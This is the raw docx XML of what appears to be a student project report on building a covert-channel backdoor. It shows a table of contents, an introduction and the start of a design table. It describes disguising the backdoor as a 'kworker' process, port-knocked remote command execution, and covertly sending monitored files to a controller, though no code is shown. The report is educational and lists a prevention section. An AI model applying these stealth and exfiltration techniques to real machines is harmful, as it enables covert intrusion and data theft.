              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739274" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Basic firewall implementations on Controller</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739274 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739275" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Controller can read config file</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739275 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739276" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Slave will be monitoring a file if Controller sets mode to “file”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739276 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739277" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>When there are changes in file to monitor, send results to Controller via TCP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739277 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739278" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>When there are changes in file to monitor, send results to Controller via UDP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739278 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739279" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Slave can execute commands from Controller</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739279 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739280" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Controller can receive command results from Slave after execution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739280 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739281" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>When connection is requested, Controller recognizes port knocking sequence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739281 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2" w:rsidP="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739282" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Project Limitations &amp; Future Implementation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739282 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2" w:rsidP="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739283" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Prevention &amp; Detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739283 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2" w:rsidP="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739284" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739284 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2" w:rsidP="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739285" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Appendices</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739285 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739286" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix I - Files on Disk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739286 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2" w:rsidP="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739287" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix II - Test Evidence &amp; Observations (from previous implementation)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739287 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="h.z8w3rgmd3ewc" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="h.5v3tst6r2js6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="3" w:name="_Toc405739253"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>One of the more common approaches to compromising a machine is the unknowing implementation of code that secretly allows access to other than the intended users. The reason why it is difficult to find is because the process of the code masks itself as another trusted process. A prime example for Linux operating systems is the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kworker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” process, since there are multiple instances of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kworkers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, and for the inexperienced user, implementing another one under the same name can easily bypass their suspicion. The purpose of this assignment is to grasp a deeper understanding of the backdoor. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The program will work behind the scenes to capture specific sequences and signatures that are meant for it. Once it does and confirms that these packets match a corresponding pattern, it will execute a set of commands and then send back the results. We shall be executing some commands that may or may not compromise the machine, but the intention is to make a proof of concept. The commands can be anything, as long as the program has all the requirements to do it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="h.hrp5p8dhgqq7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="5" w:name="_Toc405739254"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t>Building on our Proof of Concept</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In our previous discussion, we have seen how covert channels work and how commands can be executed remotely using a client and server backdoor. Our final project will be to elaborate on our proof of concept, demonstrating that backdoors can be much more feature rich than to just receive and execute commands. Our goal is to be able to provide directory and file monitoring, alerting our client any changes in files or folders. The reasoning behind this is to illustrate how skilled attackers can use this concept in order to determine key files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In addition to our previously working program of the Slave and Controller, we will add more features such as file and directory monitoring, and being able to covertly send back the key files and such to our headquarters. We will also implement port knocking, and the use of configuration files to our programs. All of these features will work on top of our previous program capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="h.mbni3kzi6n8s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="7" w:name="_Toc405739255"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t>High-Level Design Work</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>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5"/>
        <w:gridCol w:w="6465"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2895" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Design Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6465" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2895" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Covert Channel Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6465" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">The user shall be able to specify one of the following protocols to use as their covert channel: TCP or UDP. However, the user shall not be able to specify which headers will be used. The protocol selected must be in agreement between both Client and Server. See </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Project Limitations and Future Implementations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> for details on this design plan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
